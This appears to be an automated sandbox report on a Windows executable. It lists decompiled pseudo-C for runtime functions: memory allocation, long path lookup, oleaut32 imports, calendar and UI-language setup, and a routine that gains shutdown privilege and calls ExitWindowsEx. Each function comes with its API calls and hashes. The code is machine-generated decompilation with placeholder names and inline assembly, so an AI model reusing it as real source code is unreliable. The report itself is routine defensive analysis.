                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00403BCC(signed int __eax) {
                                                            				void* _t4;
                                                            				intOrPtr _t7;
                                                            				signed int _t8;
                                                            				void** _t10;
                                                            				void* _t12;
                                                            				void* _t14;
                                                            
                                                            				_t8 = __eax;
                                                            				E00403B60(__eax);
                                                            				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
                                                            				if(_t4 == 0) {
                                                            					 *0x4bbaf0 = 0;
                                                            					return 0;
                                                            				} else {
                                                            					_t10 =  *0x4bbadc; // 0x4bbad8
                                                            					_t14 = _t4;
                                                            					 *_t14 = 0x4bbad8;
                                                            					 *0x4bbadc = _t4;
                                                            					 *(_t14 + 4) = _t10;
                                                            					 *_t10 = _t4;
                                                            					_t12 = _t14 + 0x13fff0;
                                                            					 *((intOrPtr*)(_t12 - 4)) = 2;
                                                            					 *0x4bbaf0 = 0x13ffe0 - _t8;
                                                            					_t7 = _t12 - _t8;
                                                            					 *0x4bbaec = _t7;
                                                            					 *(_t7 - 4) = _t8 | 0x00000002;
                                                            					return _t7;
                                                            				}
                                                            			}

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                            • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                            • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                            • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E00403CF6(void* __eax) {
                                                            				struct _MEMORY_BASIC_INFORMATION _v44;
                                                            				void* _v48;
                                                            				void* _t13;
                                                            				int _t20;
                                                            				void* _t22;
                                                            				signed int _t26;
                                                            				signed int _t29;
                                                            				signed int _t30;
                                                            				void* _t34;
                                                            				intOrPtr _t35;
                                                            				signed int _t39;
                                                            				void* _t41;
                                                            				void* _t42;
                                                            
                                                            				_push(_t29);
                                                            				_t42 = _t41 + 0xffffffdc;
                                                            				_t34 = __eax - 0x10;
                                                            				E00403C48();
                                                            				_t13 = _t34;
                                                            				 *_t42 =  *_t13;
                                                            				_v48 =  *((intOrPtr*)(_t13 + 4));
                                                            				_t26 =  *(_t13 + 0xc);
                                                            				if((_t26 & 0x00000008) != 0) {
                                                            					_t22 = _t34;
                                                            					_t39 = _t26 & 0xfffffff0;
                                                            					_t30 = 0;
                                                            					while(1) {
                                                            						VirtualQuery(_t22,  &_v44, 0x1c);
                                                            						if(VirtualFree(_t22, 0, 0x8000) == 0) {
                                                            							break;
                                                            						}
                                                            						_t35 = _v44.RegionSize;
                                                            						if(_t39 > _t35) {
                                                            							_t39 = _t39 - _t35;
                                                            							_t22 = _t22 + _t35;
                                                            							continue;
                                                            						}
                                                            						goto L10;
                                                            					}
                                                            					_t30 = _t30 | 0xffffffff;
                                                            				} else {
                                                            					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
                                                            					if(_t20 == 0) {
                                                            						_t30 = _t29 | 0xffffffff;
                                                            					} else {
                                                            						_t30 = 0;
                                                            					}
                                                            				}
                                                            				L10:
                                                            				if(_t30 == 0) {
                                                            					 *_v48 =  *_t42;
                                                            					 *( *_t42 + 4) = _v48;
                                                            				}
                                                            				 *0x4bdb78 = 0;
                                                            				return _t30;
                                                            			}

                                                            APIs
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Virtual$Free$Query
                                                            • String ID:
                                                            • API String ID: 778034434-0
                                                            • Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                            • Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
                                                            • Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
                                                            • Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            C-Code - Quality: 78%
                                                            			E0040A928(short* __eax, intOrPtr __edx) {
                                                            				short* _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				void* _v20;
                                                            				struct _WIN32_FIND_DATAW _v612;
                                                            				short _v1134;
                                                            				signed int _t50;
                                                            				signed int _t51;
                                                            				void* _t55;
                                                            				signed int _t88;
                                                            				signed int _t89;
                                                            				intOrPtr* _t90;
                                                            				signed int _t101;
                                                            				signed int _t102;
                                                            				short* _t112;
                                                            				struct HINSTANCE__* _t113;
                                                            				short* _t115;
                                                            				short* _t116;
                                                            				void* _t117;
                                                            
                                                            				_v12 = __edx;
                                                            				_v8 = __eax;
                                                            				_v16 = _v8;
                                                            				_t113 = GetModuleHandleW(L"kernel32.dll");
                                                            				if(_t113 == 0) {
                                                            					L4:
                                                            					if( *_v8 != 0x5c) {
                                                            						_t115 = _v8 + 4;
                                                            						goto L10;
                                                            					} else {
                                                            						if( *((short*)(_v8 + 2)) == 0x5c) {
                                                            							_t116 = E0040A904(_v8 + 4);
                                                            							if( *_t116 != 0) {
                                                            								_t14 = _t116 + 2; // 0x2
                                                            								_t115 = E0040A904(_t14);
                                                            								if( *_t115 != 0) {
                                                            									L10:
                                                            									_t88 = _t115 - _v8;
                                                            									_t89 = _t88 >> 1;
                                                            									if(_t88 < 0) {
                                                            										asm("adc ebx, 0x0");
                                                            									}
                                                            									_t43 = _t89 + 1;
                                                            									if(_t89 + 1 <= 0x105) {
                                                            										E0040A34C( &_v1134, _v8, _t43);
                                                            										while( *_t115 != 0) {
                                                            											_t112 = E0040A904(_t115 + 2);
                                                            											_t50 = _t112 - _t115;
                                                            											_t51 = _t50 >> 1;
                                                            											if(_t50 < 0) {
                                                            												asm("adc eax, 0x0");
                                                            											}
                                                            											if(_t51 + _t89 + 1 <= 0x105) {
                                                            												_t55 =  &_v1134 + _t89 + _t89;
                                                            												_t101 = _t112 - _t115;
                                                            												_t102 = _t101 >> 1;
                                                            												if(_t101 < 0) {
                                                            													asm("adc edx, 0x0");
                                                            												}
                                                            												E0040A34C(_t55, _t115, _t102 + 1);
                                                            												_v20 = FindFirstFileW( &_v1134,  &_v612);
                                                            												if(_v20 != 0xffffffff) {
                                                            													FindClose(_v20);
                                                            													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
                                                            														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
                                                            														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
                                                            														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
                                                            														_t115 = _t112;
                                                            														continue;
                                                            													}
                                                            												}
                                                            											}
                                                            											goto L24;
                                                            										}
                                                            										E0040A34C(_v8,  &_v1134, _v12);
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
                                                            					if(_t90 == 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						_push(0x105);
                                                            						_push( &_v1134);
                                                            						_push(_v8);
                                                            						if( *_t90() == 0) {
                                                            							goto L4;
                                                            						} else {
                                                            							E0040A34C(_v8,  &_v1134, _v12);
                                                            						}
                                                            					}
                                                            				}
                                                            				L24:
                                                            				return _v16;
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                            • API String ID: 1930782624-3908791685
                                                            • Opcode ID: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                            • Instruction ID: 0568a8f2c4c85ac628058e700237ad117df8c3680498263a44950cac296231c5
                                                            • Opcode Fuzzy Hash: 2e7747c66ca0daf9bf73dcf24122f514d4f35ae2d915a4be054088bbf24f0c4d
                                                            • Instruction Fuzzy Hash: 7841A071B003189BCB20DE98CD85A9EB3B5AB44310F1485B69945F72C1EB7CAE51CF4A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E004AF110() {
                                                            				int _v4;
                                                            				struct _TOKEN_PRIVILEGES _v16;
                                                            				void* _v20;
                                                            				int _t7;
                                                            
                                                            				if(E0041FF2C() != 2) {
                                                            					L5:
                                                            					_t7 = ExitWindowsEx(2, 0);
                                                            					asm("sbb eax, eax");
                                                            					return _t7 + 1;
                                                            				}
                                                            				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
                                                            					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
                                                            					_v16.PrivilegeCount = 1;
                                                            					_v4 = 2;
                                                            					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
                                                            					if(GetLastError() == 0) {
                                                            						goto L5;
                                                            					}
                                                            					return 0;
                                                            				}
                                                            				return 0;
                                                            			}







                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004AF120
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004AF126
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004AF13F
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF166
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004AF16B
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 004AF17C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                            • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                            • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                            • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00427874() {
                                                            				struct HINSTANCE__* _v8;
                                                            				intOrPtr _t46;
                                                            				void* _t91;
                                                            
                                                            				_v8 = GetModuleHandleW(L"oleaut32.dll");
                                                            				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
                                                            				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
                                                            				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
                                                            				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
                                                            				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
                                                            				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
                                                            				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
                                                            				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
                                                            				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
                                                            				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
                                                            				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
                                                            				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
                                                            				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
                                                            				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
                                                            				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
                                                            				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
                                                            				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
                                                            				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
                                                            				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
                                                            				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
                                                            				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
                                                            				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
                                                            				 *0x4c1188 = _t46;
                                                            				return _t46;
                                                            			}






                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                              • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                            • API String ID: 1646373207-1918263038
                                                            • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                            • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                            • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                            • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				signed int _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr* _t32;
                                                            				signed int _t53;
                                                            				signed int _t56;
                                                            				signed int _t71;
                                                            				signed int _t78;
                                                            				signed int* _t82;
                                                            				signed int _t85;
                                                            				void* _t93;
                                                            				signed int _t94;
                                                            				signed int _t95;
                                                            				signed int _t98;
                                                            				signed int _t99;
                                                            				void* _t105;
                                                            				intOrPtr _t106;
                                                            				signed int _t109;
                                                            				intOrPtr _t116;
                                                            				intOrPtr _t117;
                                                            				void* _t131;
                                                            				void* _t132;
                                                            				signed int _t134;
                                                            				void* _t136;
                                                            				void* _t137;
                                                            				void* _t139;
                                                            				void* _t140;
                                                            				intOrPtr _t141;
                                                            				void* _t142;
                                                            				long long _t161;
                                                            
                                                            				_t161 = __fp0;
                                                            				_t126 = __edi;
                                                            				_t109 = __edx;
                                                            				_t139 = _t140;
                                                            				_t141 = _t140 + 0xfffffff0;
                                                            				_push(__edi);
                                                            				_v12 = 0;
                                                            				_v8 = __edx;
                                                            				_t93 = __eax;
                                                            				_push(_t139);
                                                            				_push(0x41ea61);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t141;
                                                            				_t32 =  *0x4ba590; // 0x4bb8f8
                                                            				_t144 =  *_t32;
                                                            				if( *_t32 == 0) {
                                                            					E0040554C(0x1a);
                                                            				}
                                                            				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
                                                            				_push(_t139);
                                                            				_push(0x41ea44);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t141;
                                                            				 *0x4be7dc = 0;
                                                            				_push(0);
                                                            				E00409C00();
                                                            				_t142 = _t141 + 4;
                                                            				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
                                                            				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
                                                            				if(_t127 + 0xfffffffd - 3 >= 0) {
                                                            					__eflags = _t127 - 0xffffffffffffffff;
                                                            					if(_t127 - 0xffffffffffffffff < 0) {
                                                            						 *0x4be7dc = 1;
                                                            						_push(1);
                                                            						E00409C00();
                                                            						_t142 = _t142 + 4;
                                                            						E00407E00( *0x4be7e0, L"B.C.");
                                                            						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
                                                            						_t71 =  *0x4be7e0;
                                                            						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
                                                            						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
                                                            						E0041C1C4(1, 1, 1, __eflags, _t161);
                                                            						_v20 = E00405790();
                                                            						_v16 = 1;
                                                            						asm("fild qword [ebp-0x10]");
                                                            						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
                                                            						asm("wait");
                                                            						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
                                                            						_t78 =  *0x4be7e0;
                                                            						__eflags = _t78;
                                                            						if(_t78 != 0) {
                                                            							_t82 = _t78 - 4;
                                                            							__eflags = _t82;
                                                            							_t78 =  *_t82;
                                                            						}
                                                            						_t134 = _t78 - 1;
                                                            						__eflags = _t134;
                                                            						if(_t134 > 0) {
                                                            							_t98 = 1;
                                                            							do {
                                                            								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
                                                            								_t98 = _t98 + 1;
                                                            								_t134 = _t134 - 1;
                                                            								__eflags = _t134;
                                                            							} while (_t134 != 0);
                                                            						}
                                                            						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
                                                            					}
                                                            				} else {
                                                            					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
                                                            					_t85 =  *0x4be7e0;
                                                            					if(_t85 != 0) {
                                                            						_t85 =  *(_t85 - 4);
                                                            					}
                                                            					_t136 = _t85 - 1;
                                                            					if(_t136 >= 0) {
                                                            						_t137 = _t136 + 1;
                                                            						_t99 = 0;
                                                            						do {
                                                            							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
                                                            							_t99 = _t99 + 1;
                                                            							_t137 = _t137 - 1;
                                                            						} while (_t137 != 0);
                                                            					}
                                                            					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
                                                            				}
                                                            				_t94 =  *0x4be7e0;
                                                            				if(_t94 != 0) {
                                                            					_t94 =  *(_t94 - 4);
                                                            				}
                                                            				_push(_t94);
                                                            				E00409C00();
                                                            				_t53 =  *0x4be7e0;
                                                            				if(_t53 != 0) {
                                                            					_t53 =  *(_t53 - 4);
                                                            				}
                                                            				_t131 = _t53 - 1;
                                                            				if(_t131 >= 0) {
                                                            					_t132 = _t131 + 1;
                                                            					_t95 = 0;
                                                            					do {
                                                            						_t127 = _t95 + _t95 * 2;
                                                            						_t106 =  *0x416e18; // 0x416e1c
                                                            						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
                                                            						_t95 = _t95 + 1;
                                                            						_t132 = _t132 - 1;
                                                            					} while (_t132 != 0);
                                                            				}
                                                            				_t116 =  *0x41e600; // 0x41e604
                                                            				E00409D24(0x4be7e0, _t116);
                                                            				_t56 =  *0x4be7e0;
                                                            				if(_t56 != 0) {
                                                            					_t56 =  *(_t56 - 4);
                                                            				}
                                                            				 *0x4be7dc = _t56;
                                                            				_pop(_t117);
                                                            				_pop(_t105);
                                                            				 *[fs:eax] = _t117;
                                                            				_push(0x41ea4b);
                                                            				return E00406868( *0x4be7e4, _t105, _t127);
                                                            			}


































                                                            0x0041e988
                                                            0x0041e976
                                                            0x0041e999
                                                            0x0041e999
                                                            0x0041e86d
                                                            0x0041e87b
                                                            0x0041e880
                                                            0x0041e887
                                                            0x0041e88c
                                                            0x0041e88c
                                                            0x0041e890
                                                            0x0041e893
                                                            0x0041e895
                                                            0x0041e896
                                                            0x0041e898
                                                            0x0041e8a1
                                                            0x0041e8a9
                                                            0x0041e8aa
                                                            0x0041e8aa
                                                            0x0041e898
                                                            0x0041e8bb
                                                            0x0041e8bb
                                                            0x0041e9a3
                                                            0x0041e9a7
                                                            0x0041e9ac
                                                            0x0041e9ac
                                                            0x0041e9ae
                                                            0x0041e9c2
                                                            0x0041e9ca
                                                            0x0041e9d1
                                                            0x0041e9d6
                                                            0x0041e9d6
                                                            0x0041e9da
                                                            0x0041e9dd
                                                            0x0041e9df
                                                            0x0041e9e0
                                                            0x0041e9e2
                                                            0x0041e9e2
                                                            0x0041e9fa
                                                            0x0041ea00
                                                            0x0041ea05
                                                            0x0041ea06
                                                            0x0041ea06
                                                            0x0041e9e2
                                                            0x0041ea0e
                                                            0x0041ea14
                                                            0x0041ea19
                                                            0x0041ea20
                                                            0x0041ea25
                                                            0x0041ea25
                                                            0x0041ea27
                                                            0x0041ea2e
                                                            0x0041ea30
                                                            0x0041ea31
                                                            0x0041ea34
                                                            0x0041ea43

                                                            APIs
                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CalendarEnumInfoLocaleThread
                                                            • String ID: B.C.$ToA$K$K$K
                                                            • API String ID: 683597275-1724967715
                                                            • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                            • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                            • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                            • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040A250() {
                                                            				signed int _t2;
                                                            				_Unknown_base(*)()* _t8;
                                                            
                                                            				InitializeCriticalSection(0x4bdc10);
                                                            				 *0x4bdc28 = 0x7f;
                                                            				_t2 = GetVersion() & 0x000000ff;
                                                            				 *0x4bdc0c = _t2 - 6 >= 0;
                                                            				if( *0x4bdc0c != 0) {
                                                            					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
                                                            					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
                                                            					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
                                                            					 *0x4bdc08 = _t8;
                                                            					return _t8;
                                                            				}
                                                            				return _t2;
                                                            			}






                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                            • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
